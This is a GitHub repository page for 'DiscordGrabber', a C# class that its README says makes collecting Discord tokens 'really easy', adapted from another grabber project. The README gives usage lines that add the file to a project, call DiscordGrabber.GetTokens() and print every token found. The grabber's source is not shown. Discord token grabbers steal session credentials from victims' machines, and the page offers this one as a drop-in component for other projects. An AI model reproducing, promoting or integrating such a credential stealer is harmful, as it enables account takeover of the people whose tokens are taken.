Skip to content

MoistCoder/DiscordGrabber

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 

Repository files navigation

DiscordGrabber

DiscordGrabber is a C# class that makes the collection of Discord Tokens really easy. I use this class for many of my projects.

The Original code is from Nyxonn (C4ndyGrabber).
I modified it for easier private use and implementation.

Usage

Just add the DiscordGrabber.cs file in your Project and call:

DiscordGrabber.GetTokens();

Example

This will output all found tokens in a console window:

foreach (string token in DiscordGrabber.GetTokens()) Console.WriteLine(token);